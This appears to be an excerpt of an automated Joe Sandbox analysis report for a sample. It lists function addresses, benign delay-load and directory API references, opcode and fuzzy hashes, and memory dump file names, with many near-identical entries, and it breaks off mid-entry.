                                              • Opcode ID: 7aea722c8202561ebae23d2f681ed1ab6e574d155960bc16a0e7b53a1081b4e0
                                              • Instruction ID: eccb63ef1266ee7496331d257a5265a642018e7d0e1eb35eb03221749bb1f578
                                              • Opcode Fuzzy Hash: 7aea722c8202561ebae23d2f681ed1ab6e574d155960bc16a0e7b53a1081b4e0
                                              • Instruction Fuzzy Hash: E7B012D52AD040FC3D0C11461F02C76030DC9D0F22B32832BF100C2043A4500C421031
                                              Function 00CB4D04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4CF1
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 1ed187d7422d50979a5d4e9825b2a672f2b2566bbcca0b0d610e105c78f424ed
                                              • Instruction ID: 2dd51c9e3e5ccdbfd309d8fdf0e0b4b732269e18645b0c8d769a822e8cb97d37
                                              • Opcode Fuzzy Hash: 1ed187d7422d50979a5d4e9825b2a672f2b2566bbcca0b0d610e105c78f424ed
                                              • Instruction Fuzzy Hash: BDB012C529D241BC324C61461D02C7A062DC0C0F10730433BF004C2143E4411C851031
                                              Function 00CB4D18 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4CF1
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: dcb8d7a8776f700eeed004ca3078f24e5a94f72196f1b5de68e8b467d73f0374
                                              • Instruction ID: e46dacc787eeee53cca5f292d17154a9d942f8b0d3f8247240c5f359c089b6bf
                                              • Opcode Fuzzy Hash: dcb8d7a8776f700eeed004ca3078f24e5a94f72196f1b5de68e8b467d73f0374
                                              • Instruction Fuzzy Hash: CBB012C529D141BC310C62461D02CBA021DC0C1F10730832BF404C3143E4401C481231
                                              Function 00CB4D22 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4CF1
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 8cc8cceb5b6f824c50d445945d3f2417a89ac01e51a637036fdfa0a034f5e309
                                              • Instruction ID: 1e936d7a1f6e40b4ee955618328df1d26e8ec214b4b3b26eeb6dc66a04bb4c16
                                              • Opcode Fuzzy Hash: 8cc8cceb5b6f824c50d445945d3f2417a89ac01e51a637036fdfa0a034f5e309
                                              • Instruction Fuzzy Hash: F4B012C529D142BC310C61462D02C7A021DD0C0F10730433FF004C2143E4401C451031
                                              Function 00CA2226 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 00CA2233
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory
                                              • String ID:
                                              • API String ID: 1611563598-0
                                              • Opcode ID: fa75ec8862f356b9eb551ad813c940c5cf7600884a8071654460ea01c44dd651
                                              • Instruction ID: 1298c9cad33e2af56a2dba25f2cf9341fada86171e18ae49e573d3685f829e01
                                              • Opcode Fuzzy Hash: fa75ec8862f356b9eb551ad813c940c5cf7600884a8071654460ea01c44dd651
                                              • Instruction Fuzzy Hash: DFC04870201201DF8708CFA8DACCF0A77AABFA271AB418568F444CB020CB34DC62DA25
                                              Function 00CB49D0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 7b99a2b47f6ebe88ef8bb0a9ac6a4b277290e0b0fe38cb9506c258c7836e40c5
                                              • Instruction ID: 46b43ef908858b000cee8fa41c260e3cd29c651ad813d933dc1df70263a9954b
                                              • Opcode Fuzzy Hash: 7b99a2b47f6ebe88ef8bb0a9ac6a4b277290e0b0fe38cb9506c258c7836e40c5
                                              • Instruction Fuzzy Hash: 28A001A6AAD152FC320C62A27E07CBB031EC5C5BA1B318A2BF502C6583A89159952031
                                              Function 00CB49EE Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: eeb0388c779c6f44a5f2d4dd880863f3949b047a36173d6319d8baebe91088f9
                                              • Instruction ID: 46b43ef908858b000cee8fa41c260e3cd29c651ad813d933dc1df70263a9954b
                                              • Opcode Fuzzy Hash: eeb0388c779c6f44a5f2d4dd880863f3949b047a36173d6319d8baebe91088f9
                                              • Instruction Fuzzy Hash: 28A001A6AAD152FC320C62A27E07CBB031EC5C5BA1B318A2BF502C6583A89159952031
                                              Function 00CB49E4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f2896864de95b1adb909403bc0b7308a9d300c4067c294066a307413ca43bf24
                                              • Instruction ID: 46b43ef908858b000cee8fa41c260e3cd29c651ad813d933dc1df70263a9954b
                                              • Opcode Fuzzy Hash: f2896864de95b1adb909403bc0b7308a9d300c4067c294066a307413ca43bf24
                                              • Instruction Fuzzy Hash: 28A001A6AAD152FC320C62A27E07CBB031EC5C5BA1B318A2BF502C6583A89159952031
                                              Function 00CB49F8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 7de852a153253c1fa27a2269518e95bf2034a4698dee0302f00a6ffe4786a986
                                              • Instruction ID: 46b43ef908858b000cee8fa41c260e3cd29c651ad813d933dc1df70263a9954b
                                              • Opcode Fuzzy Hash: 7de852a153253c1fa27a2269518e95bf2034a4698dee0302f00a6ffe4786a986
                                              • Instruction Fuzzy Hash: 28A001A6AAD152FC320C62A27E07CBB031EC5C5BA1B318A2BF502C6583A89159952031
                                              Function 00CB49B2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 8e292d4bec0f5a53e49ae362e0e20c30a7e643f40fc91480f2eead2f32444e5a
                                              • Instruction ID: 46b43ef908858b000cee8fa41c260e3cd29c651ad813d933dc1df70263a9954b
                                              • Opcode Fuzzy Hash: 8e292d4bec0f5a53e49ae362e0e20c30a7e643f40fc91480f2eead2f32444e5a
                                              • Instruction Fuzzy Hash: 28A001A6AAD152FC320C62A27E07CBB031EC5C5BA1B318A2BF502C6583A89159952031
                                              Function 00CB4976 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 240563561426dbcd6688e829cc288792cc2290f7af9381e6f50c9f0b94d8894c
                                              • Instruction ID: 46b43ef908858b000cee8fa41c260e3cd29c651ad813d933dc1df70263a9954b
                                              • Opcode Fuzzy Hash: 240563561426dbcd6688e829cc288792cc2290f7af9381e6f50c9f0b94d8894c
                                              • Instruction Fuzzy Hash: 28A001A6AAD152FC320C62A27E07CBB031EC5C5BA1B318A2BF502C6583A89159952031
                                              Function 00CB4A02 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: be356906b22c23fd5dde95436045ba83f9a9703409d49a06ba1b9d845a86b243
                                              • Instruction ID: 46b43ef908858b000cee8fa41c260e3cd29c651ad813d933dc1df70263a9954b
                                              • Opcode Fuzzy Hash: be356906b22c23fd5dde95436045ba83f9a9703409d49a06ba1b9d845a86b243
                                              • Instruction Fuzzy Hash: 28A001A6AAD152FC320C62A27E07CBB031EC5C5BA1B318A2BF502C6583A89159952031
                                              Function 00CB4B85 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: e8100b46405aabce316bb5e2155cf0a99049f5dd40f7ff1df2ea2a21dc07ce50
                                              • Instruction ID: fdadbfd81f0de769b8c07bf919050d321fdbe8d7e41aa56607611355990c647d
                                              • Opcode Fuzzy Hash: e8100b46405aabce316bb5e2155cf0a99049f5dd40f7ff1df2ea2a21dc07ce50
                                              • Instruction Fuzzy Hash: 3EA001D62AD552BD310C62966E07DBB121EC4D5BA5B31AA2FF602C6187A89058A52031
                                              Function 00CB4B49 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 318a95d87384c6435032b5df3b5dd0db9ad7c8f5a98dfda36594a17ac92050b4
                                              • Instruction ID: fdadbfd81f0de769b8c07bf919050d321fdbe8d7e41aa56607611355990c647d
                                              • Opcode Fuzzy Hash: 318a95d87384c6435032b5df3b5dd0db9ad7c8f5a98dfda36594a17ac92050b4
                                              • Instruction Fuzzy Hash: 3EA001D62AD552BD310C62966E07DBB121EC4D5BA5B31AA2FF602C6187A89058A52031
                                              Function 00CB4B53 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 9e281f39581110681373b07bacfa14630a03650c6372b1785ac2647e2b282a59
                                              • Instruction ID: fdadbfd81f0de769b8c07bf919050d321fdbe8d7e41aa56607611355990c647d
                                              • Opcode Fuzzy Hash: 9e281f39581110681373b07bacfa14630a03650c6372b1785ac2647e2b282a59
                                              • Instruction Fuzzy Hash: 3EA001D62AD552BD310C62966E07DBB121EC4D5BA5B31AA2FF602C6187A89058A52031
                                              Function 00CB4B7B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: bd2350bbbbc0c3e1c2e677a380a105645da962dbf26e8a4e2956f1ea978e9cab
                                              • Instruction ID: fdadbfd81f0de769b8c07bf919050d321fdbe8d7e41aa56607611355990c647d
                                              • Opcode Fuzzy Hash: bd2350bbbbc0c3e1c2e677a380a105645da962dbf26e8a4e2956f1ea978e9cab
                                              • Instruction Fuzzy Hash: 3EA001D62AD552BD310C62966E07DBB121EC4D5BA5B31AA2FF602C6187A89058A52031
                                              Function 00CB4B71 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: aca3f63284bdefd10ce0f4817197be06158ef22329d83544405f3cdfd8e1c64f
                                              • Instruction ID: fdadbfd81f0de769b8c07bf919050d321fdbe8d7e41aa56607611355990c647d
